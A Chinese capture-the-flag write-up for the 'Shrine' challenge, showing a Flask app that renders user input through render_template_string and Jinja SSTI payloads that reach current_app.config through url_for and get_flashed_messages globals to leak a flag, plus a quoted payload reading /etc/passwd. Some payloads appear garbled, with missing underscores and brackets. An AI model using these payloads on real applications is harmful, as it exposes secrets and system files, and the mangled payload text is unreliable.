[CTF]攻防世界:Shrin(SSTI)

题目:攻防世界:Shrin(SSTI)

提示:题目代码

bash 复制代码
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
  1. /shrine/路由接收任意路径参数
  2. render_template_string()直接渲染用户输入
  3. 过滤机制:()被删除,config和self变量被设为None
  4. 无法使用 subclasses()、popen() 等带括号的函数
bash 复制代码
无法使用
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

步骤

1. 利用Flask全局函数访问current_app

Payload: /shrine/{{url_for.globals'current_app'.config.FLAG}}

原理:

url_for 是Flask内置全局函数,无需括号即可访问__globals__ 获取函数的全局变量字典(无括号)current_app

指向当前的Flask应用实例app 通过 current_app.config 访问被"隐藏"的配置

2. 利用get_flashed_messages

替代Payload:

/shrine/{{get_flashed_messages.globals'current_app'.config'FLAG'}}

原理:与url_for类似,利用另一个Flask全局函数绕过限制。

相关推荐
一拳一个娘娘腔15 小时前
【SRC漏洞挖掘系列】第17期:漏洞组合拳(Chain Exploit)—— 把“蚊子”养成“恐龙”
网络·安全·web安全
llxxyy卢17 小时前
好靶场部分题目
web安全·web
德迅--文琪1 天前
看不见的围墙:APP背后的网络安全暗门
安全·web安全
Fortinet_CHINA1 天前
AI正在重塑网络安全格局,但技能差距仍是核心风险
人工智能·安全·web安全
宋浮檀s2 天前
春秋云镜——CVE-2020-25540
网络·安全·web安全
郑洁文2 天前
面向Web安全的Python渗透测试系统设计与实现
python·安全·web安全
woniu_buhui_fei2 天前
常见的网络攻击
web安全
WangX-西石油2 天前
DVWA靶场Low级别Brute Force学习
学习·web安全·网络安全
小熊officer2 天前
网络渗透(Network Penetration)
网络·安全·web安全